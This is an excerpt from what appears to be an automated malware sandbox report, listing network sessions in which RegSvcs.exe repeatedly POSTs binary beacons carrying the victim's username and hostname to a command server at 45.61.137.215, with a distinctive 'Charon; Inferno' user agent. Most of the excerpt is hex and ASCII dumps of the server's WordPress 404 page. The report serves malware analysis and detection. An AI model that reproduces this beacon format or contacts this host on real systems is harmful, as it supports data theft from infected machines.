                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:58.294105053 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:58.294116974 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:58.294126987 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:58.294138908 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:58.294152021 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:58.294564009 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:58.294608116 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:58.294621944 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:58.294876099 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            66192.168.2.94978145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:58.470592976 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:58.475689888 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:01.002490997 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:59 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:01.002540112 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:45:01.002547979 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:45:01.002648115 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:45:01.002665043 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:45:01.002676010 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:45:01.002685070 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                                            Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                                            May 29, 2024 15:45:01.002693892 CEST1236INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                                            Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                                            May 29, 2024 15:45:01.002703905 CEST776INData Raw: 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d
                                            Data Ascii: nous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--c
                                            May 29, 2024 15:45:01.002715111 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63
                                            Data Ascii: --wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            67192.168.2.94978245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:01.201417923 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:01.206513882 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:03.698487997 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:01 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:03.698559999 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:03.698574066 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:03.698587894 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:03.698609114 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:03.698620081 CEST1120INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:45:03.698801041 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:03.698822975 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
                                            May 29, 2024 15:45:03.698833942 CEST1236INData Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                            Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange
                                            May 29, 2024 15:45:03.698844910 CEST672INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72
                                            Data Ascii: p--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            68192.168.2.94978345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:03.852643013 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:03.857657909 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:06.365297079 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:04 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
